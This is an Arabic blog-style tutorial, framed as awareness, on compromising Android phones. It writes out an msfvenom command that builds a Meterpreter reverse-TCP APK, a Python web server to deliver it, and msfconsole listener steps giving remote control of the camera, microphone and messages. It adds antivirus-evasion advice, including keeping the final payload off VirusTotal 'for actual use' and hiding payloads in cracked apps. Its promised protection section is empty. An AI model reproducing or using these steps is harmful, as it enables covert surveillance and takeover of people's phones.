كيف يمكن اختراق هاتفك بنقرة زر، وكيف تحمي نفسك؟

ما رأيك لو أخبرتك أن هاتفك قد يكون مراقبًا الآن؟ محادثاتك، رسائلك، وحتى موقعك، كلها قد تكون في يد شخص آخر. وكل هذا بسبب تطبيق يبدو طبيعيًا تمامًا. كيف يحدث هذا، وكيف تحمي نفسك؟ دعونا نكتشف الحقيقة.

في هذا المقال، سنغطي كل شيء بدءًا من تجهيز بيئة الاختبار، إلى تنفيذ الهجوم، وأخيرًا، كيفية حماية أنفسنا. لكن قبل أن ندخل في التفاصيل التقنية، دعونا نفهم ما هو الموضوع بالضبط ولماذا وكيف يمكن لهذه المعرفة أن تحمينا.

فهم اختراق الهواتف

عندما نتحدث عن اختراق الهواتف، لا نقصد فقط أن أحدهم يخمن كلمة مرورك. الموضوع أخطر من ذلك. الاختراق يعني وصولًا غير مصرح به إلى جهازك والتحكم فيه، من قراءة رسائلك وتتبع موقعك، وقد يصل الأمر إلى التحكم في الميكروفون وكاميرا الجهاز.

لدى المهاجمين أساليب كثيرة تتطور مع الوقت، منها:

في هذا المقال، سنركز على نوع خطير من البرامج الضارة وتقنيات التصيد التي تستهدف أجهزة أندرويد. سنوضح كيف يستطيع المهاجمون إنشاء تطبيق ضار وجعل الضحية تثبته. هذا سيعطينا فكرة واضحة عن مدى التحكم الذي يمكن للمهاجم الحصول عليه في جهاز مخترق. لكن الأهم، تذكروا أن هدفنا هنا ليس الأذى، بل فهم هذه التهديدات لكي نحمي أنفسنا بشكل أفضل.

الخطوة الأولى: تجهيز بيئة الاختبار الافتراضية

لإنشاء بيئتنا الافتراضية، اذهب إلى أي محرك بحث (أنا أستخدم Bing) واكتب Genymotion. عندما تظهر لك النتائج، يمكنك التنزيل مباشرة. يمكنك الدخول إلى موقعهم الرسمي، وبعد ذلك، اذهب إلى قسم التنزيلات.

ستجد خيارين للتنزيل. نزل النسخة التي تريدها. لو افترضنا أنك تستخدم ويندوز، انتبه هنا: إذا كان لديك VirtualBox مثبتًا مسبقًا، اختر الخيار الثاني، لأن الخيار الأول سيقوم بتنزيل VirtualBox مرة أخرى. أغلب الظن أنني قد شرحت لكم سابقًا كيفية استخدام VirtualBox، فالأغلبية لديهم، لذا اختر الخيار الثاني.

عندما تقوم بتنزيله، بقية الخطوات سهلة جدًا: “التالي” ثم “التالي” حتى تنتهي ويتم تثبيته لديك. عندما يتم تثبيته، افتح التطبيق من سطح المكتب. قبل فتحه، سيحذرك من أنه يجب عليك إعادة تشغيل الجهاز. قم بإعادة التشغيل لكي يعمل التطبيق بطريقة أفضل وتتجنب ظهور الأخطاء.

بعد إعادة تشغيل الجهاز وتشغيل التطبيق مرة أخرى، سينقلك إلى صفحة تسجيل الدخول. يمكنك إنشاء حساب بشكل طبيعي؛ سينقلك إلى المتصفح لإنشاء حساب جديد، ثم قم بتأكيد البريد الإلكتروني. بعد ذلك، اكتب معلومات الدخول وادخل إلى التطبيق.

بعد الدخول، ستظهر لك الواجهة الرئيسية. ما يهمنا هو علامة الزائد (+). عند الضغط عليها، سترى أنواعًا كثيرة من الأجهزة. هنا يمكنك تجربة الحمولة الخبيثة (payload) الخاصة بك على أكثر من جهاز دون إلحاق الضرر بأحد، وبالتالي تعرف إذا كانت تعمل أم لا.

لدينا خيارات كثيرة، يمكنك مثلًا اختيار Google Pixel 3. اضغط على “Next”. هنا إذا أردت تغيير الاسم أو إجراء أي تعديل على المعلومات (بالنسبة لي لا أحتاج ذلك). هنا أيضًا إذا كنت تحتاج لتعديل المعالج، حجم الذاكرة (RAM)، أو حجم الجهاز الافتراضي (VM size)، يمكنك فعل ذلك. أنا لن أغير شيئًا وسأتركه كما هو. اضغط “Next” مرة أخرى. ستظهر معلومات إضافية قد لا تهمك، اضغط “Next”. في النهاية، اختر إعدادات الشبكة، ابقَ على الخيار الافتراضي (NAT) ثم اضغط “Install”.

عند الضغط على “Install”، سيبدأ تنزيل جهاز Google Pixel 3. تعتمد سرعة التنزيل على سرعة الإنترنت لديك. بعد ذلك، سيتم إعداده في VirtualBox، ولهذا السبب قلنا إن وجود VirtualBox مهم.

الآن، عند تشغيل تطبيق VirtualBox، ستجد أن الجهاز تم إنشاؤه تلقائيًا بواسطة Genymotion. اضغط عليه ضغطتين وهو سيعمل بنفسه ويهيئ نفسه حتى يعمل المحاكي في تطبيق Genymotion كهاتف طبيعي. فقط انتظر حتى ترى رسالة التأكيد النهائية، وبذلك تعرف أن التطبيق جاهز.

الآن عد إلى Genymotion واضغط على الجهاز الذي أنشأته. سترى أنه يقوم بالتمهيد (Booting). سيعمل نظام التشغيل الخاص بـ Google Pixel 3 وسترى جهازًا وكأنه هاتف حقيقي. يمكنك الوصول منه إلى المتصفح، ومن المتصفح سنقوم بتنزيل الحمولة الخبيثة الخاصة بنا.

الخطوة الثانية: إنشاء الحمولة الخبيثة (Payload)

الآن ننتقل إلى نظام كالي لينكس (إذا لم يكن مثبتًا لديك، قم بتثبيته). افتح الطرفية (Terminal) واكتب الأمر التالي لإنشاء الحمولة الخبيثة باستخدام msfvenom.

sudo msfvenom -p android/meterpreter/reverse_tcp LHOST=<YOUR_IP> LPORT=4444 -o app.apk

شرح الأمر:

الخطوة الثالثة: إعداد خادم ومستمع

بعد إنشاء الحمولة، نحتاج إلى طريقة لنقلها إلى جهاز الضحية. سنقوم بإنشاء خادم ويب بسيط باستخدام بايثون. في نفس المجلد الذي يوجد به ملف app.apk، اكتب الأمر التالي:

python3 -m http.server 8000

الآن، أي شخص يصل إلى عنوان IP الخاص بك على المنفذ 8000 سيتمكن من رؤية الملفات في هذا المجلد وتنزيلها.

في نافذة طرفية أخرى، سنستخدم msfconsole لإعداد “مستمع” ينتظر الاتصال من جهاز الضحية.

msfconsole

بعد أن يفتح، اتبع الأوامر التالية:

  1. اختر المعالج (Handler):
    use multi/handler
    
  2. حدد نفس الحمولة التي أنشأتها:
    set payload android/meterpreter/reverse_tcp
    
  3. اعرض الخيارات للتأكد:
    show options
    
  4. اضبط الـ LHOST والـ LPORT بنفس القيم التي استخدمتها في msfvenom:
    set LHOST <YOUR_IP>
    set LPORT 4444
    
  5. ابدأ المستمع:
    run
    

الآن، msfconsole في وضع الاستماع. بمجرد أن يقوم الضحية بتثبيت وفتح التطبيق الخبيث، ستحصل على جلسة تحكم.

الخطوة الرابعة: تنفيذ الهجوم

على جهاز الضحية (في حالتنا، المحاكي)، افتح المتصفح واكتب عنوان IP الخاص بك متبوعًا بالمنفذ http://<YOUR_IP>:8000. ستظهر لك صفحة تحتوي على ملف app.apk. قم بالضغط عليه وتنزيله.

بعد التنزيل، قم بتثبيت التطبيق. قد تحتاج إلى السماح بالتثبيت من “مصادر غير معروفة” في إعدادات أندرويد. بمجرد فتح التطبيق، ستلاحظ أن جلسة meterpreter قد بدأت في نافذة msfconsole على جهاز كالي الخاص بك.

الخطوة الخامسة: التحكم في الجهاز

لقد نجح الهجوم. الآن لديك جلسة تحكم كاملة. يمكنك كتابة help لرؤية قائمة بالأوامر المتاحة.

على سبيل المثال، يمكنك استخدام sysinfo للحصول على معلومات حول نظام الجهاز للتأكد من أنك متصل بالجهاز الصحيح.

meterpreter > sysinfo

ستظهر لك معلومات مثل Android 10. يمكنك أيضًا فتح الكاميرا، تسجيل الصوت من الميكروفون، الوصول إلى الرسائل، جهات الاتصال، وغيرها الكثير.

تقنيات التخفي المتقدمة

الحمولة التي أنشأناها أساسية. في الواقع، برامج مكافحة الفيروسات الحديثة قد تكتشفها. لذلك، تحتاج إلى تضمين بعض أنواع التشفير القوية لحمولتك لإخفاء طبيعتها عن برامج مكافحة الفيروسات. يمكنك تجربة أكثر من تشفير وطبقة باستخدام الخيارات المتاحة في msfvenom.

ملاحظة هامة: يمكنك تجربة الحمولة على مواقع الفحص مثل VirusTotal، ولكن كن حذرًا. عندما تفحص حمولتك ويكتشف الموقع أنها فيروس، سيتم إنشاء “بصمة” خاصة لهذه الحمولة ومشاركتها مع بقية برامج مكافحة الفيروسات. لذلك، إذا نجحت في إنشاء حمولة غير قابلة للكشف، قم بإنشاء واحدة أخرى تشبهها للاستخدام الفعلي، لأن البصمة تتغير. لا تفحص أبدًا حمولتك النهائية على VirusTotal.

طريقة أخرى شائعة هي دمج الحمولة في برامج “الكراك”. يأخذ المهاجمون تطبيقًا مدفوعًا ويجعلونه مجانيًا، وعندما تقوم بتحميله، يكون بداخله هذه الحمولة التي تتيح لهم التحكم في جهازك.

كيف تحمي نفسك؟

الاختيار هنا يعتمد على فطنتك وطريقة تفكيرك. إليك بعض النصائح لحماية نفسك:

شارك المقال

أحدث المقالات

CONNECTED
ONLINE: ...
SECURE
00:00:00